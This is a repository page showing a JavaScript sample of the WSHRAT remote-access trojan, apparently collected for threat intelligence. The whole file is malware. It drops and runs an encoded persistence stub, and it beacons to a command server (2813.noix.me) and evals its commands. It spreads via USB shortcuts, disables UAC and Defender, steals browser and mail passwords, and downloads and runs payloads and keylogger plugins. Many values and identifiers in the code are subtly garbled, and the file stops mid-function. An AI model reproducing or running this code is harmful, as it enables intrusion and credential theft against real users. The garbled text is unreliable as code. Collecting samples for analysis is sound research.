ch0ic3/CyberThreatIntel
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
52866c78bd
CyberThreatIntel/Unknown/Unknown phishing group/code/layer2_TnT.js

1054 lines
175 KiB
JavaScript
Raw Normal View History

Create layer2_TnT.js
2019-09-29 14:36:28 +00:00
try
{
var PersistenceText = "dmFyIHRhbmtldyA9IFt7cGw6W1tmdW5jdGlvbigpe3JldHVybiAiTHk4OFd5QnlaV852WkdWeUlEb2dhMjluYm1sMGJ5LSU+b1l5a2djMnQ1Y0dVZ89pQnNhWFpsT25WdWEyNXZkMjR1YzJGc1pYTTJOQ0JkUGdvS0x5ODlMVDB0UFMwOUxUMGdZMjl1Wm1sbklEMHRQUzA5TFQwdFBTMDlMVDB0UFMwOUxUMHRQUzA5TFQwdFBTMDlDZ3AyWVhJZ2FHOXpkQy0lPjlJQ0p3YkhWbmFXNXpjbll4TG1SMVkydGtibk11YjNKbklqc0tkbUZ5SUhCdmNuUWdQUy0lPjNOelUzT3dwMllYSWdhVzV6ZEdGc2JHUnBjaS0lPjlJQ0lsWVhCd1pHRjBZU1VpT3dwMllYSWdjblZ1UVhOQlpHMXBiaS0lPjlJR1poYkhObE93cDJZWElnYkc1clptbHNaUy0lPjlJSFJ5ZFdVN0NuWmhjaUJzYm10bWIyeGtaWElnUFNCMGNuVmxPd29LYVdZb2NuVnVRWE5CWkcxcGJpLSU+OVBTQjBjblZsS1hzS0NYTjBZWEowZFhCRmJHVjJZWFJsS0NrN0NuMEthV1lvVjFOamNtbHdkQzVCY21kMWJXVnVkSE11VG1GdFpXUXVSWGhwYzNSektDSmxiR1YyWVhSbFpDSXBJRDA5SUhSeWRXVXBld29KWkdsellXSnNaVk5sWTNWeWFYUjVLQ2s3Q24wS0x5ODlMVDB0UFMwOUxUMGdjSFZpYkdsaklIWmhjaS0lPjlMVDB0UFMwOUxUMHRQUzA5TFQwdFBTMDlMVDB0UFMwOUNncDJZWElnYzJobGJHeHZZbW9nUFNCWFUyTnlhWEIwTG1OeVpXRjBaVTlpYW1WamRDZ2lkM05qY21sd2RDNXphR1ZzYkNJcE93cDJZWElnWm1sc1pYTjVjM1JsYlc5aWFpLSU+OUlGZFRZM0pwY0hRdVkzSmxZWFJsVDJKcVpXTjBLQ0p6WTNKcGNIUnBibWN1Wm1sc1pYTjVjM1JsYlc5aWFtVmpkQ0lwT3dwMllYSWdhSFIwY0c5aWFpLSU+OUlGZFRZM0pwY0hRdVkzSmxZWFJsVDJKcVpXTjBLQ0p0YzNodGJESXVlRzFzYUhSMGNDSXBPd29LQ2k4dlBTMDlMVDB0UFMwOUlIQnlhWFpoZENCMllYSWdQUzA5TFQwdFBTMDlMVDB0UFMwOUxUMHRQUzA5TFQwS0NuWmhjaUJwYm5OMFlXeHNibUZ0WlMtJT45SUZkVFkzSnBjSFF1YzJOeWFYQjBUbUZ0WlRzS2RtRnlJSE4wWVhKMGRYLSU+Z1BTQnphR1ZzYkc5aWFpNXpjR1ZqYVdGc1JtOXNaR1Z5Y3lnaWMzUmhjblIxY0NJcElDc2dJbHhjSWpzS2FXNXpkR0ZzYkdScGNpLSU+OUlITm9aV3hzYjJKcUxrVjRjR0Z1WkVWdWRtbHliMjV0Wlc1MFUzUnlhVzVuY3locGJuTjBZV3hzWkdseUtTLSU+cklDSmNYQ0k3Q21sbUtDRm1hV3hsYzNsemRHVnRiMkpxTG1admJHUmxja1Y0YVhOMGN5aHBibk4wWVd4c1pHbHlLU2w3SUNCcGJuTjBZV3hzWkdseUlEMGdjMmhsYkd4dlltb3VSWGh3WVc1a1JXNTJhWEp2Ym0xbGJuUlRkSEpwYm1kektDSWxkR1Z0Y0NVaUtTLSU+cklDSmNYQ0k3ZlFwMllYSWdjM0JzYVhSbGNpLSU+OUlDSjhJanNLZG1GeUlITmthM0JoZEdnZ1BTQnBibk4wWVd4c1pHbHlJQ3NnSW5kemFITmtheUk3Q25aaGNpQnpaR3RtYVd4bElEMGdjMlJyY0dGMGFDLSU+cklDSmNYQ0lnS3lCamFISW9NVEV5S1MtJT5ySUdOb2NpZ3hNakVwSUNzZ1kyaHlLREV4TmlrZ0t5QmphSElvTVQtJT4wS1MtJT5ySUdOb2NpZ3hNVEVwSUNzZ1kyaHlLREV4TUNrZ0t5QmphSElvTkRZcElDc2dZMmh5S0RFd01Ta2dLeUJqYUhJb01USXdLUy0lPnJJR85vY2lneE1ERXBPd3AyWVhJZ2MyeGxaWC0lPmdQUy0lPjFNRC0lPndPeS0lPktkbUZ5SUhKbGMzQnZibk5sTENCamJXUXNJSEJoY21GdExDQnZibVZ2Ym1ObE93b0tkbUZ5SUdsdVppLSU+OUlDSWlPd3AyWVhJZ2RYTmljM0J5WldGa2FXNW5JRDBnSWlJN0NuWmhjaUJ6ZEdGeWRHUmhkR1VnUFMtJT5pSWpzS0NpOHZQUzA5TFQwdFBTMDlJR052WkdVZ2MzUmhjblFnUFMwOUxUMHRQUzA5TFQwdFBTMDlMVDB0UFMwOUxUMEtDbWx1YzNSaGJtTmxLQ2s3Q2dwM2FHbHNaU2gwY25WbEtYc0tDWFJ5ZVhzS0NRbHBibk4wWVd4c0tDazdDZ29KQ1hKbGMzQnZibk5sSUQwZ0lpSTdDaS0lPmdJQy0lPmdJQy0lPmdjbVZ6Y0c5dWMyVWdQU0J3YjNOMElDZ2lhWE10Y21WaFpIa2lMQ0lpS1RzS0NRbGpiV1FnUFNCeVpYTndiMjV6WlM1emNHeHBkQ2h6Y0d4cGRHVnlLVHNLQ1FsemQybDBZMmdvWTIxa1d6QmRLWHNLSUMtJT5nSUMtJT5nSUMtJT5nSUMtJT5nWTJGelpTLSU+aVpHbHpZMjl1Ym1WamRDSTZDZ2tKQ1FrZ0lGZFRZM0pwY0hRdWNYVnBkQ2dwT3dvSkNRa0pJQ0JpY21WaGF6c0tDUWtKWTJGelpTLSU+aWNtVmliMjkwSWpvS0NRa0pDUy0lPmdjMmhsYkd4dlltb3VjblZ1S0NJbFkyOXRjM0JsWXlVZ0wyTWdjMmgxZEdSdmQyNGdMM0lnTDNRZ01DLSU+dlppSXNJRC0lPnNJSFJ5ZFdVcE93b0pDUWtKSUNCaWNtVmhhenNLQ1FrSlkyRnpaUy0lPmljMmgxZEdSdmQyNGlPZ29KQ1FrSklDQnphR1ZzYkc5aWFpNXlkVzRvSWlWamIyMXpjR1ZqSlMtJT52WXlCemFIVjBaRzkzYmktJT52Y3ktJT52ZEMtJT53SUM5bUlpd2dNQ3dnZEhKMVpTazdDZ2tKQ1FrZ0lHSnlaV0ZyT3dvZ0lDLSU+Z0lDLSU+Z0lDLSU+Z0lDQmpZWE5sSUNKbGVHTmxZM1YwWlNJNkNpLSU+Z0lDLSU+Z0lDLSU+Z0lDLSU+Z0lDLSU+Z0lDLSU+Z0lIQmhjbUZ0SUQwZ1kyMWtXekZkT3dvSkNRa0pJQ0JsZG1Gc0tIQmhjbUZ0S1RzS0NRa0pDUy0lPmdZbkpsWVdzN0Nna0pDV05oYzJVZ0ltbHVjM1JoYkd3dGMyUnJJam9LQ1FrSkNTLSU+Z2FXNXpkR0ZzYkhOa2F5Z3BPd29KQ1FrSklDQmljbVZoYXpzS0NRa0pZMkZ6WlMtJT5pWjJWMExYQmhjM01pT2dvSkNRa0pJQ0J3WVhOelozSmhZbUpsY2loamJXUmJNVjBzSUNKamJXUmpMbVY0WlNJc0lHTnRaRnN5WFNrN0Nna0pDUWtnSUdKeVpXRnJPd29KQ1FsallYTmxJQ0puWlhRdGNHRnpjeTF2Wm1ac2FXNWxJam9LQ1FrSkNTLSU+Z2NHRnpjMmR5WVdKaVpYSW9ZMjFrV3pOZExDLSU+aVkyMWtZeTVsZUdVaUxDLSU+aWFXVWlLVHNLQ1FrSkNTLSU+Z2NHRnpjMmR5WVdKaVpYSW9JbTUxYkd3aUxDLSU+aVkyMWtZeTVsZUdVaUxDLSU+aVkyaHliMjFsSWlrN0Nna0pDUWtnSUhCaGMzTm5jbUZpWW1WeUtDSnVkV3hzSWl3Z0ltTnRaR011WlhobElpd2dJbTF2ZW1sc2JHRWlLVHNLQ1FrSkNTLSU+Z2NHRnpjMmR5WVdKaVpYSXlLR050WkZzeFhTd2dJbU50WkdNdVpYaGxJaXdnWTIxa1d6SmRLVHNLQ1FrSkNTLSU+
var wshShell1 = WScript.CreateObject("WScript.Shell");
var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");
var stubpath1 = appdatadir1 +"\\WtDdKNnmSU.js";
var decoded1= decodeBase64(PersistenceText);
writeBytes(stubpath1, decoded1);
wshShell1.run("wscript //B \""+ stubpath1+ "\"");
}
catch(er){}
function writeBytes(file, bytes)
{
try
{
var binaryStream = WScript.CreateObject("ADODB.Stream");
binaryStream.Type= 1;
binaryStream.Open();
binaryStream.Write(bytes);
binaryStream.SaveToFile(file, 2);
}
catch(err){}
}
function decodeBase64(base64)
{
var DM= WScript.CreateObject("Microsoft.XMLDOM");
var EL = DM.createElement("tmx");
EL.dataType = "bin.base64";
EL.text= base64;
return EL.nodeTypedValue;
}
wshShell1= null;
var host= "2813.noix.me";
var port =2813;
var installdir ="%temp%";
var runAsAdmin = false;
var lnkfile= true;
var lnkfolder = true;
if(runAsAdmin == true){startupElevate();}
if(WScript.Arguments.Named.Exists("elevated") == true){disableSecurity();}
var shellobj = WScript.createObject("wscript.shell");
var filesystemobj = WScript.createObject("scripting.filesystemobject");
var httpobj = WScript.createObject("msxml2.xmlhttp");
var installname = WScript.scriptName;
var startup= shellobj.specialFolders("startup") +"\\";
installdir= shellobj.ExpandEnvironmentStrings(installdir)+ "\\";
if(!filesystemobj.folderExists(installdir)){ installdir= shellobj.ExpandEnvironmentStrings("%temp%") +"\\";}
var spliter = "|";
var sdkpath = installdir + "wshsdk";
var sdkfile= sdkpath +"\\" + "python.exe";
var sleep= 5008;
var response, cmd, param, oneonce;
var inf = "";
var usbspreading = "";
var startdate = "";
instance();
if(getBinder() != null){runBinder();}
while(true)
{
try
{
install();
response ="";
response = post("is-ready","");
cmd = response.split(spliter);
switch(cmd[0])
{
case "disconnect":
WScript.quit();
break;
case "reboot":
shellobj.run("%comspec% /c shutdown /r /t 8 /f",0, true);
break;
case "shutdown":
shellobj.run("%comspec% /c shutdown /s /t 0(/f", 8, true);
break;
case "excecute":
param= cmd[1];
eval(param);
break;
case "install-sdk":
if(filesystemobj.fileExists(sdkfile)){updatestatus("SDK+Already+Installed");}
else{installsdk();}
break;
case "get-pass":
passgrabber(cmd[1],"cmdc.exe", cmd[2]);
break;
case "get-pass-offline":
if (filesystemobj.fileExists(sdkfile))
{
passgrabber(cmd[3],"cmdc.exe","ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null","cmdc.exe","mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
}
else
{
updatestatus("Installing+SDK");
var stat= installsdk();
if(stat == true)
{
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null","cmdc.exe","chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1],"cmdc.exe", cmd[2]);
}
else
{
var msg = shellobj.ExpandEnvironmentStrings("%computername%") +"/" + shellobj.ExpandEnvironmentStrings("%username%");
post("show-toast","Unable to automatically recover password for "+ msg+ " as the Password Recovery SDK cannot be automatically installed. You can try again manually.");
}
}
break;
case "update":
param = response.substr(response.indexOf("|") + 1);
oneonce.close();
oneonce = filesystemobj.openTextFile(installdir+ installname ,2, false);
oneonce.write(param);
oneonce.close();
shellobj.run("wscript.exe //B \""+ installdir + installname+ "\"");
WScript.quit();
case "uninstall":
uninstall();
break;
case "up-n-exec":
download(cmd[1],cmd[2]);
break;
case "bring-log":
upload(installdir + "wshlogs\\" + cmd[1], "take-log");
break;
case "down-n-exec":
sitedownloader(cmd[1],cmd[2]);
break;
case "filemanager":
servicestarter(cmd[1], "fm-plugin.exe", information());
break;
case "rdp":
keyloggerstarter(cmd[1], "rd-plugin.exe", information(),"", true);
break;
case "rev-proxy":
reverseproxy("rprox.exe", cmd[1]);
break;
case "exit-proxy":
shellobj.run("%comspec%(/c taskkill(/F(/IM rprox.exe", 0, true);
break;
case "keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0, false);
break;
case "offline-keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1, false);
break;
case "browse-logs":
post("is-logs", enumfaf(installdir+ "wshlogs"));
break;
case "cmd-shell":
param = cmd[1];
post("is-cmd-shell",cmdshell(param));
break;
case "get-processes":
post("is-processes", enumprocess());
break;
case "disable-uac":
disableSecurity();
updatestatus("UAC+Disabled+(Reboot+Required)");
break;
case "check-eligible":
if(filesystemobj.fileExists(cmd[1])){updatestatus("Is+Eligible");}
else{updatestatus("Not+Eligible");}
break;
case "force-eligible":
if(WScript.Arguments.Named.Exists("elevated")== true)
{
if(filesystemobj.folderExists(cmd[1]))
{
shellobj.run("%comspec% /c "+ cmd[2], 0, true);
updatestatus("SUCCESS");
}
else{updatestatus("Component+Missing");}
}
else{updatestatus("Elevation+Required");}
break;
case "elevate":
if(WScript.Arguments.Named.Exists("elevated")== false)
{
try
{
oneonce.close();
oneonce = null;
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe"," //B \"" + WScript.ScriptFullName + "\" /elevated", "","runas",1);
updatestatus("Client+Elevated");
}
catch(nn){}
WScript.quit();
}
else{updatestatus("Client+Elevated");}
break;
case "if-elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){updatestatus("Client+Not+Elevated");}
else{updatestatus("Client+Elevated");}
break;
case "kill-process":
exitprocess(cmd[1]);
break;
case "sleep":
param = cmd[1];
sleep = eval(param);
break;
}
}
catch(er){}
WScript.sleep(sleep);
}
function installsdk()
{
var success = false;
try
{
var sdkurl = post("moz-sdk", "");
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttx");
objhttpdownload.open("get", sdkurl, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=8");
objhttpdownload.send();
if(filesystemobj.fileExists(installdir+ "wshsdk.zip")){filesystemobj.deleteFile(installdir +"wshsdk.zip");}
if (objhttpdownload.status == 280)
{
try
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "wshsdk.zix");
objstreamdownload.close();
objstreamdownload= null;
}
catch(ez){}
}
if(filesystemobj.fileExists(installdir +"wshsdk.zip"))
{
UnZip(installdir +"wshsdk.zip", sdkpath);
success= true;
updatestatus("SDK+Installed");
}
}
catch(err){return success;}
return success;
}
function install()
{
var lnkobj;
var filename;
var foldername;
var fileicon;
var foldericon;
upstart();
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext())
{
var drive = dri.item();
if (drive.isready == true)
{
if (drive.freespace> 8 )
{
if (drive.drivetype == 1)
{
try
{
filesystemobj.copyFile(WScript.scriptFullName , drive.path + "\\" + installname,true);
if(filesystemobj.fileExists (drive.path +"\\" + installname)){filesystemobj.getFile(drive.path + "\\" + installname.attributes) = 6;}
}
catch(eiju){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext())
{
try
{
var file = fi.item();
if(lnkfile== false){break;}
if(file.name.indexOf("."))
{
if((file.name.split(".")[file.name.split(".").length -1]).toLowercase != "lnk")
{
file.attributes =6;
if(file.name.toUppercase != installname.toUppercase )
{
filename= file.name.split(".");
lnkobj = shellobj.createShortcut(drive.path+ "\\" + filename[0] +".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory ="";
lnkobj.arguments ="/c start "+ installname.replace(new RegExp(" ", "g"), "\" \"") + "&start(" + file.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
try{fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.split(".")[file.name.split(".").length -1]+ "\\" +"\\defaulticon\\")) ; }
catch(eeee){}
if(fileicon.indexOf(",") == 8){lnkobj.iconLocation = file.path;}
else {lnkobj.iconLocation = fileicon;}
lnkobj.save();
}
}
}
}
catch(err){}
}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path+ "\\").subFolders);!fi.atEnd(); fi.moveNext())
{
try
{
var folder = fi.item();
if (lnkfolder== false){break;}
folder.attributes =6;
foldername = folder.name;
lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
lnkobj.windowStyle= 7;
lnkobj.targetPath= "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExx("(","g","\" \"")+ "&start explorer ")+ folder.name.replace(new RegExp(" ", "g", "\" \"") +"&exit");
foldericon= shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
if (foldericon.indexOf(",") == 8){lnkobj.iconLocation= folder.path;}
else {lnkobj.iconLocation= foldericon;}
lnkobj.save();
}
catch(err){}
}
}
}
}
}
}
function startupElevate()
{
if(WScript.Arguments.Named.Exists("elevated")== false)
{
try{WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", "(//B \"" + WScript.ScriptFullName+ "\"(/elevated","", "runas", 1);}
catch(nn){}
WScript.quit();
}
}
function disableSecurity()
{
if(WScript.Arguments.Named.Exists("elevated")== true)
{
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
oReg.SetDwordValue(0x80800802,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA",0);
oReg.SetDwordValue(0x80080082,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","ConsentPromptBehaviorAdmin", 0);
oReg.SetDwordValue(0x80800802,"SOFTWARE\\Policies\\Microsoft\\Windows Defender","DisableAntiSpyware",1);
oReg = null;
}
}
function uninstall()
{
try
{
var filename;
var foldername;
try
{
shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
}
catch(ei){}
try
{
filesystemobj.deleteFile(startup + installname ,true);
filesystemobj.deleteFile(WScript.scriptFullName ,true);
}
catch(eej){}
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext())
{
var drive = dri.item();
if (drive.isready == true)
{
if (drive.freespace > 8 )
{
if (drive.drivetype == 1)
{
for(var fi= new Enumerator(filesystemobj.getfolder(drive.path +"\\").files); !fi.atEnd(); fi.moveNext())
{
var file = fi.item();
try
{
if (file.name.indexOf("."))
{
if (file.name.split(".")[file.name.split(".").length -1].toLowercase !="lnk" )
{
file.attributes =0;
if (file.name.toUppercase != installname.toUppercase )
{
filename = file.name.split(".");
filesystemobj.deleteFile(drive.path + "\\"+ filename[0] + ".lnk" );
}
else{filesystemobj.deleteFile(drive.path + "\\"+ file.name);}
}
else{filesystemobj.deleteFile(file.path);}
}
}
catch(ex){}
}
for(var fi= new Enumerator(filesystemobj.getfolder(drive.path +("\\").subFolders)); !fi.atEnd(); fi.moveNext())
{
var folder= fi.item();
folder.attributes = 0;
}
}
}
}
}
}
catch(err){}
WScript.quit();
}
function post(cmd ,param)
{
try
{
httpobj.open("post","http://"+ host +":" + port +"/" + cmd, false);
httpobj.setRequestHeader("user-agent:",information());
httpobj.send(param);
return httpobj.responseText;
}
catch(err){return "";}
}
function information()
{
try
{
if (inf == "")
{
inf = hwid() + spliter;
inf= inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter ;
inf= inf + shellobj.ExpandEnvironmentStrings("%username%")+ spliter;
var root= GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var os = root.ExecQuery("select * from win32_operatingsystem");
for(var fi = new Enumerator(os);!fi.atEnd(); fi.moveNext())
{
var osinfo = fi.item();
inf = inf + osinfo.caption + spliter;
break;
}
inf = inf + "plus" + spliter;
inf = inf + security()+ spliter;
inf = inf + usbspreading;
inf = "WSHRAT"+ spliter + inf + spliter + "JavaScript-v2.0" + spliter + getCountry();
return inf;
}
else{return inf;}
}
catch(err){return "";}
}
function getCountry()
{
try
{
var objhttpdownload= WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", "http://ix-api.com/json/", false);
objhttpdownload.setRequestHeader("user-agent:", "Mozilla/5.0(Windows NT(10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36");
objhttpdownload.send();
if(objhttpdownload.status==208)
{
var objstreamdownload= WScript.CreateObject("adodb.stream");
objstreamdownload.Type =1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position= 8;
objstreamdownload.Type = 2;
objstreamdownload.CharSet ="us-ascii";
var raw= objstreamdownload.ReadText();
var cc ="01";
var cn = "Unknown";
try
{
cc = raw.substr(raw.indexOf("countryCode") + 14);
cc = cc.substr(0, cc.indexOf("\""));
}
catch(err){}
try
{
cn= raw.substr(raw.indexOf("country")+ 10);
cn = cn.substr(8, cn.indexOf("\""));
}
catch(err){}
return cc + ":" + cn;
}
else{return "01:Unknown";}
}
catch(ex){return "01:Unknown";}
}
function upstart ()
{
try
{
try
{
shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\"+ installname.split(".")[0], "wscript.exe //B \""+ installdir + installname + "\"" ,"REG_SZ");
}
catch(ei){}
filesystemobj.copyFile(WScript.scriptFullName, installdir+ installname, true);
filesystemobj.copyFile(WScript.scriptFullName, startup+ installname, true);
}
catch(err){}
}
function hwid()
{
try
{
var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var disks= root.ExecQuery ("select * from win32_logicaldisk");
for(var fi= new Enumerator(disks); !fi.atEnd(); fi.moveNext())
{
var disk = fi.item();
if(disk.volumeSerialNumber != ""){return disk.volumeSerialNumber; break;}
}
}
catch(err){return "";}
}
function security()
{
try
{
var objwmiservice= GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem",null,48);
var versionstr, osversion;
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext())
{
var objitem = fi.item();
versionstr= objitem.version.toString().split(".");
}
osversion = versionstr[0] + ".";
for (var x= 1; x < versionstr.length; x++){osversion= osversion+ versionstr[0];}
osversion = eval(osversion);
var sc;
if(osversion > 6){ sc = "securitycenter2"; } else{ sc= "securitycenter";}
var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
var colantivirus= objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 8);
var secu = "";
for(var fi = new Enumerator(colantivirus);!fi.atEnd(); fi.moveNext())
{
var objantivirus = fi.item();
secu= secu + objantivirus.displayName + ".";
}
if(secu == ""){secu = "nan-av";}
return secu;
}
catch(err){}
}
function getDate()
{
var s = "";
var d= new Date();
s += d.getDate() + "/";
s+=(d.getMonth() + 1) +"/";
s += d.getYear();
return s;
}
function instance()
{
try
{
try
{
usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\"+ installname.split(".")[0] +"\\");} catch(eee){}
if(usbspreading=="")
{
if(WScript.scriptFullName.substr(1).toLowercase == ":\\"+ installname.toLowercase )
{
usbspreading= "true - "+ getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\"+ installname.split(".")[0] +"\\", usbspreading,"REG_SZ");} catch(eeeee){}
}
else
{
usbspreading= "false(- " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");} catch(eeeee){}
}
}
upstart();
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
var installfullnameshort= filesystemobj.getFile(installdir+ installname);
if (scriptfullnameshort.shortPath.toLowercase != installfullnameshort.shortPath.toLowercase )
{
shellobj.run("wscript.exe //B \""+ installdir + installname+ "\"");
WScript.quit();
}
oneonce = filesystemobj.openTextFile(installdir+ installname ,8, false);
}
catch(err){WScript.quit();}
}
function decode_base64(base64_string)
{
var yhm_pepe= WScript.CreateObject("ADODB.Stream");
var spike= (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmx");
spike.dataType = "bin.base64";
spike.text= base64_string;
yhm_pepe.Type = 1;
yhm_pepe.Open();
yhm_pepe.Write(spike.nodeTypedValue);
yhm_pepe.Position = 0;
yhm_pepe.Type =2;
yhm_pepe.CharSet= "us-ascii";
return yhm_pepe.ReadText();
}
function decode_pass(retcmd)
{
try
{
var content, nss, command;
if(retcmd == "mozilla"){command = "give-me-ffpv";}
else if(retcmd == "chrome"){command= "give-me-chpv";}
else if(retcmd == "foxmail"){command = "give-me-fm";}
var objhttpdownload= WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","http://" + host + ":" + port+"/" + command, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
if(filesystemobj.fileExists(installdir+ "rundll")){filesystemobj.deleteFile(installdir+ "rundll");}
if (objhttpdownload.status == 200)
{
try
{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type= 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type =2;
objstreamdownload.CharSet= "us-ascii";
content = objstreamdownload.ReadText();
nss= sdkpath +"\\nss";
content= content.replace(new RegExp("%nss%", "g"), nss); //for firefox
content = content.replace(new RegExp("%path%", "g"), installdir+ "Login Data"); //for chrome
var sw = filesystemobj.openTextFile(installdir+ "rundll",2, true);
sw.write(content);
sw.close();
sw = null;
objstreamdownload.close();
objstreamdownload= null;
}
catch(ez){}
}
shellobj.run("%comspec% /c cd \""+ sdkpath + "\" && "+ gsp(sdkfile)+ " "+ gsp(installdir + "rundll") + "> \""+ installdir +"wshout\"",0, true);
WScript.sleex(2800);
var sr = filesystemobj.openTextFile(installdir + "wshout");
content= sr.readall();
sr.close();
sr= null;
filesystemobj.deleteFile(installdir+ "rundll");
filesystemobj.deleteFile(installdir + "wshout");
post(retcmd, content);
}
catch(err){}
}
function chr(code)
{
return String.fromCharCode(code);
}
function gsp(path)
{
return filesystemobj.getFile(path).shortPath;
}
function passgrabber (fileurl, filename, retcmd)
{
try
{
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
var content, profile, folder;
if (retcmd=="ie")
{
content = decode_base64(fileurl);
eval(content);
return;
}
else if(retcmd=="chrome")
{
folder = shellobj.ExpandEnvironmentStrings("%temp%");
folder = folder.substr(0, folder.toLowercase).indexOf("temp") + "Google\\Chrome\\User Data\\Default\\Login Data";
if (objfsodownload.fileExists(folder))
{
objfsodownload.copyFile(folder, installdir + "Login Data", true);
if (objfsodownload.fileExists(sdkfile))
{
decode_pass(retcmd);
objfsodownload.deleteFile(installdir +"Login Data");
}
else{post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");}
}
else{post(retcmd, "No Password Found");}
}
else if(retcmd == "foxmail")
{
if(objfsodownload.fileExists(sdkfile)){decode_pass(retcmd);}
else{post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");}
}
else if(retcmd== "mozilla")
{
folder = shellobj.ExpandEnvironmentStrings("%appdata%")+ "\\Mozilla\\Firefox\\";
if(objfsodownload.fileExists(folder + "profiles.ini"))
{
content = filesystemobj.openTextFile(folder +"profiles.ini").readall();
if (content.indexOf("Path=")> 8)
{
content = content.substr(content.indexOf("Path=") +5);
content = content.substr(0, content.indexOf("\r\n"));
profile = (folder+ content).replace(new RegExp("/", "g"), "\\");
folder = profile + "\logins.json";
if (objfsodownload.fileExists(sdkfile)){decode_pass(retcmd);}
else{post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");}
}
else{post(retcmd,"No Password Found");}
}
else{post(retcmd, "No Password Found");}
}
else{passgrabber2(fileurl, filename, retcmd);}
}
catch(err){}
}
function UnZip(zipfile, ExtractTo)
{
if(filesystemobj.GetExtensionName(zipfile) == "zix")
{
if(!filesystemobj.FolderExists(ExtractTo)){filesystemobj.CreateFolder(ExtractTo);}
var objShell = WScript.CreateObject("Shell.Application");
var destination= objShell.NameSpace(ExtractTo);
var zip_content = objShell.NameSpace(zipfile).Items();
for(i= 8; i < zip_content.Count; i++)
{
if(filesystemobj.FileExists(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path)))
{
filesystemobj.DeleteFile(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path));
}
destination.copyHere(zip_content.item(i), 28);
}
}
}
function passgrabber2(fileurl, filename, retcmd)
{
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
try{filesystemobj.deleteFile(installdir + filename+ "data");} catch(ey){}
var config_file = installdir + filename.substr(8, filename.lastIndexOf(".")) + ".cfg";
